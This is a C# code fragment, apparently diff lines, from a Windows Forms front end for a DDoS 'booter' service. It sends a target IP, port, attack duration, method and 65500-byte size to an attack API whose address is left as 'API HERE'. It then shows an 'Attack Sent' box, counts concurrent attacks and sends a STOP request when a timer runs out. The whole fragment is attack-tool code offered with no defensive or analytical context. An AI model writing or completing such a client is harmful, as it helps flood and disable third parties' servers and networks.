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- webBrowser1.Navigate("API HERE" + "&host=" + tb_host.Text + "&port=" + tb_port.Text + "&time=" + logInComboBox1.Text + "&method=" + logInComboBox2.Text + "&size=65500");
- MessageBox.Show("\r\nIP:" + tb_host.Text + "\r\nPort:" + tb_port.Text + "\r\nTime:" + logInComboBox1.Text + "\r\nMethod:" + logInComboBox2.Text, "Attack Sent");
- tb_host.Enabled = false;
- tb_port.Enabled = false;
- logInComboBox1.Enabled = false;
- logInComboBox2.Enabled = false;
- logInButton1.Enabled = false;
- timer1.Interval = 10000; // here time in milliseconds
- timer1.Start();
- logInLabel14.Text = "Concurrent Attacks 1/1";
- logInRichTextBox2.Text = "IP:" + tb_host.Text + "|" + "Port:" + tb_port.Text + "|" + "Time:" + logInComboBox1.Text + "|" + "Method:" + logInComboBox2.Text + "|" + "Attack Sent>" + "API - Server 1";
- logInButton1.Enabled = true;
- tb_host.Enabled = true;
- tb_port.Enabled = true;
- logInComboBox1.Enabled = true;
- logInComboBox2.Enabled = true;
- logInLabel14.Text = "Concurrent Attacks 0/1";
- timer1.Stop();
- webBrowser1.Navigate("API HERE" + "&host=" + tb_host.Text + "&port=" + tb_port.Text + "&time=" + "&method=STOP" + logInComboBox2.Text + "&size=");
- logInRichTextBox2.Text = "IP:" + tb_host.Text + "|" + "Port:" + tb_port.Text + "|" + "Time:" + logInComboBox1.Text + "|" + "Method:" + logInComboBox2.Text + "|" + "Attack Stop>" + "API - Server 1";
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